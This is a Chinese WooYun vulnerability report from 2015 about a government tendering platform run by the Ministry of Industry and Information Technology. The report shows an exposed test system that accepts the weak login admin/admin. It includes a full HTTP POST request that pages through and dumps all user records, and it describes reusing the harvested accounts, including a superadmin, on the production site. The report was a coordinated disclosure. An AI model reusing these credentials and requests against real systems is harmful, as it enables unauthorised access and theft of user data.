当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0112281

漏洞标题:看我如何通过一个测试系统拿到某政府招投平台所有用户信息

相关厂商:中华人民共和国工业和信息化部

漏洞作者: 茜茜公主

提交时间:2015-05-06 00:10

修复时间:2015-06-23 16:56

公开时间:2015-06-23 16:56

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-06: 细节已通知厂商并且等待厂商处理中
2015-05-09: 厂商已经确认,细节仅向厂商公开
2015-05-19: 细节向核心白帽子及相关领域专家公开
2015-05-29: 细节向普通白帽子公开
2015-06-08: 细节向实习白帽子公开
2015-06-23: 细节向公众公开

简要描述:

测试环境对外,目测正式环境数据库备份后给测试库使用,外加该系统本身的一个设计缺陷,造成用户帐号和密码泄漏,求上首页

详细说明:

首先是该系统的测试地址:
工信部通信工程建设项目招标投标管理信息平台
https://219.239.97.63/DispatchAction.do?efFormEname=POIX11

QQ截图20150505180338.jpg


该系统的正式地址为:
https://txzb.miit.gov.cn/DispatchAction.do;jsessionid=E8759D3399304CB9DF7F35DC3D025FCA?efFormEname=POIX11
可以看到两个系统的数据还是有区别的,测试环境因为存在弱口令,已经有人开始尝试如何shell了
测试库的帐号和密码为admin/admin

QQ截图20150505181118.jpg


QQ截图20150505181137.jpg

漏洞证明:

缺陷存在于该系统后台管理的系统管理-用户管理模块处

QQ截图20150505181936.jpg


QQ截图20150505182057.jpg


抓包后你会得到:

QQ截图20150505182739.jpg


{"birth":"","chineseName":"应急中心管理员","companyId":"00000000000000000100","companyName":"应急中心","departName":"","departmentId":"","email":"","englishName":"","fax":"","id":"00000000000000000100","jobId":"","mobile":"","password":"马赛克","remark":"","sex":"","status":"","telephone":"","userName":"马赛克"},{"birth":"","chineseName":"应急中心管局管理员","companyId":"33","companyName":"应急中心管局","departName":"","departmentId":"","email":"","englishName":"","fax":"","id":"00000000000000000101","jobId":"","mobile":"","password":"马赛克","remark":"","sex":"","status":"","telephone":"","userName":"马赛克"},{"birth":"","chineseName":"平台管理员","companyId":"","companyName":"","departName":"","departmentId":"","email":"","englishName":"","fax":"","id":"00000000000000001000","jobId":"","mobile":"","password":"马赛克","remark":"","sex":"","status":"","telephone":"","userName":"马赛克"}


可以利用系统的分页功能把所有用户信息都显示出来

POST https://219.239.97.63/DispatchAction.do HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://219.239.97.63/DispatchAction.do
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 219.239.97.63
Content-Length: 38
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: JSESSIONID=720443C4ED0E18838D5AA4D3CE5442BA; 72677.52326546499=admin
page=1&pagesize=100&efFormEname=PYUR01


我们尝试使用该测试库得到的用户,登录正式环境
应急中心管理员"userName":"yjzx",发现登录失败,得知并不是所有的帐号密码都能和正式库一一对应,但大部分还是有效的。

QQ截图20150505202857.jpg


QQ截图20150505203042.jpg


QQ截图20150505203504.jpg


还有个超管帐号:platadmin

QQ截图20150505203648.jpg


用同样的方法可以得到正式库所有用户的帐号名及md5密码

QQ截图20150505203810.jpg


注意我们可从该系统内得到

QQ截图20150505204333.jpg


QQ截图20150505204438.jpg


QQ截图20150505204516.jpg


QQ截图20150505204609.jpg


包括但不限于以上证照

修复方案:

测试库不对外,强口令

版权声明:转载请注明来源 茜茜公主@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-05-09 16:54

厂商回复:

CNVD确认所述情况,已经转由CNCERT向国家上级信息安全协调机构上报,由其后续协调网站管理单位处置.

最新状态:

暂无